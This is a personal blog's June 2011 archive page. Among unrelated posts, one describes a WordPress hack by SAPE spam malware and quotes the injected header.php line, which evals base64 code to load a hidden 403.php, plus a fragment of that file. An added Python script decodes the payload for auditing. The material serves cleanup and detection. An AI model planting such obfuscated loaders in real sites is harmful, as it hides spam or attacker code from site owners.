Archive for June 2011

An Etherpad You Can Trust

I have much bemoaned the loss of Etherpad to the Google. The project was open sourced so, in theory, anyone can run an Etherpad server. But it does take a little bit of nerd acumen to get the thing going. I’ve heard of a couple groups that have started servers… PiratePad, TypeWith.me, Sync.in, EtherPad Foundation, iEtherPad.com. But I’ve been wary of trusting most of these guys. I mean, come on, I’m going to write semi-confidential things on PiratePad?

Here’s one I think I can trust:
etherpad.mozilla.org:9000

Blog Hacked… Cleaned: SAPE eval base64

My WordPress blog had been hacked. It displayed ads for stupid things in the far lower right corner of some blog pages. It looks like it displayed ads on just 1 in 10 of my pages, especially “Category” pages. You might want to take a peek on your own WordPress blog to make sure it hasn’t happened to you.

Here’s where the bad code was and how I fixed it.

The header.php file of my theme had been altered. It began:

<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>

That code was obviously running code in my /blog/wp-content/themes/default/images/ directory.

Curiously, the “modified date” on the header.php file must have been hacked. I know this because the file has a “last modified” date of April 2009, however the backup of my website in October 2010 doesn’t have the spamming code. Therefore, the hacked code must have been added more recently.

2 files had been added to the /blog/wp-content/themes/default/images/ directory on the blog:
403.php
links.db

Here are the most suspicious parts of 403.php

define('_SAPE_USER', '466c19cd8253185aebaab9f182431010');
...
eval(@base64_decode("JGJvdGlwcyA9IGFycmF5KAkN

“SAPE” is a known malware (via)

You should never have any “eval base64” code in your WordPress installation. It’s almost always some piece of code trying to hide itself.
————————————————–

I removed the malicious code from my header.php and deleted 403.php and links.db from the default theme. Done.
Update: read the comments!
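
An added example, not part of the original post or of any WordPress tooling: it audits a live theme directory against a known-good backup by SHA-256 (the post found the file date could not be trusted) and statically decodes any eval(base64_decode("...")) literal so it can be read without being run. The payload string is the one quoted from header.php above; the directory layout, function names and placeholder file contents are constructed for the demo.

```python
import base64, hashlib, os, re, tempfile
from pathlib import Path

INJECTED = (  # first line of the altered header.php as quoted in the post, split for width
    "<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); "
    '@eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJb'
    "J0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9z"
    'dGFydCgiY2FsbGJhY2siKTs="));?>\n'
)
EVAL_B64 = re.compile(r"""eval\s*\(\s*@?\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)""", re.I)

def decode_eval_payloads(php_source: str) -> list:
    """Decode every eval(base64_decode("...")) literal for reading; nothing is executed."""
    out = []
    for blob in EVAL_B64.findall(php_source):
        blob = re.sub(r"\s+", "", blob)
        blob = blob[: len(blob) // 4 * 4]        # tolerate a truncated literal
        out.append(base64.b64decode(blob).decode("utf-8", "replace"))
    return out

def diff_against_backup(live: Path, backup: Path) -> dict:
    """Compare trees by SHA-256 rather than mtime, which the post found had been altered."""
    def digests(root: Path) -> dict:
        return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
                for p in root.rglob("*") if p.is_file()}
    old, new = digests(backup), digests(live)
    return {"added": sorted(new.keys() - old.keys()),
            "changed": sorted(k for k in new.keys() & old.keys() if new[k] != old[k])}

def demo() -> dict:
    """Build a constructed backup/live theme pair in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp, "backup"), Path(tmp, "live")
        clean = "<?php /* constructed stand-in for the theme header */ ?>\n"
        for root in (backup, live):
            (root / "images").mkdir(parents=True)
        (backup / "header.php").write_text(clean)
        (live / "header.php").write_text(INJECTED + clean)
        (live / "images/403.php").write_text("<?php /* constructed placeholder */ ?>\n")
        (live / "images/links.db").write_text("constructed placeholder\n")
        for root in (backup, live):   # same April 2009 mtime on both: a date check sees nothing
            os.utime(root / "header.php", (1240000000, 1240000000))
        report = diff_against_backup(live, backup)
        report["decoded"] = {f: decode_eval_payloads((live / f).read_text(errors="replace"))
                             for f in report["added"] + report["changed"] if f.endswith(".php")}
        return report

if __name__ == "__main__":
    print(demo())
```

The decoded header.php payload shows what the one-liner does: it registers an output-buffer callback that pulls in 403.php from the images directory on every page render.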

Blog Hacked by Spammers

Darn it, this blog, Lee.org was hacked by spammers. On about 1 in 10 page loads to some of my Category pages, I see links at the very bottom of the blog page to places like this:

http://trixi.com.uaSPAM/index.php?categoryID=1485
playstation 2 киев

and

http://atlantika.com.uaSPAM/brands/43/
muscletech атлантика Элитный салон Стелла предоставляет тонизирующий
http://body.com.uaSPAM
эротический массаж
недорого

I inserted the word “SPAM” to obfuscate it.

I’m working at finding the rogue code now.

Looking for Radiation Therapy Help

I am considering a change of career to become a radiation therapist or similar medical technician. If you know about this field, I would be indebted to you if you’d let me speak to you about it.

AT&T U-Verse Signup Discount

Update 12-1-11: This program is permanently on hold as I don’t have AT&T residential service anymore.

If you are signing up for new AT&T services, I’ll split the referral fee I get with you via the Rewards for Referrals program!

AT&T will send you a gift card for $25 for each service you sign up for of U-Verse TV, U-Verse high speed internet, or U-Verse voice! AT&T will send me a gift card too, because, well we’re friends!

Here’s how to do it:

  1. Go to this page to tell me your name and email address
  2. In a day or so AT&T will send you an email indicating that I nominated you for the referral program.
  3. Go ahead and sign up for the AT&T services you were going to sign up for
  4. Email me your new U-Verse account number. My email address is Lee at Lee daht org.

That’s it. In about 6 weeks AT&T will send both you and me a gift card for $25 for each service you signed up for… up to $75 if you sign up for all 3 U-Verse services!

You can find out all the details about the program at refer.att.com

Oh and if you sign up for regular AT&T high speed internet, or wireless, or DirectTV, or home telephone service, AT&T will give me $25… and I’ll split it with you… I’ll Paypal you $12.50.

Burning Man 2011 Resource Guide — Part 3 of 3

Phew! What a list! Here is part 3 of 3 of the Burning Man 2011 Resource Guide. You should start with part 1

Services


Burning Man 2011 Resource Guide — Part 2 of 3

Part 2 of 3 of the Burning Man 2011 Resource Guide. Start with part 1

————————————————–

Playa Wear


Burning Man 2011 Resource Guide — Part 1 of 3

Every year Burning Man puts out a guide for buying supplies and such. This year’s list is pretty darn huge so I’ve split it into 3 parts. Here you go! You can find the original listing here.

Be sure to check out the 2010 guide.


Photos from the WhatWillYouLearn Bread event

Hurray for Bread!

Scoring the tops before they go in... for style points!

All the students' bread coming out of the oven!

Tasty success!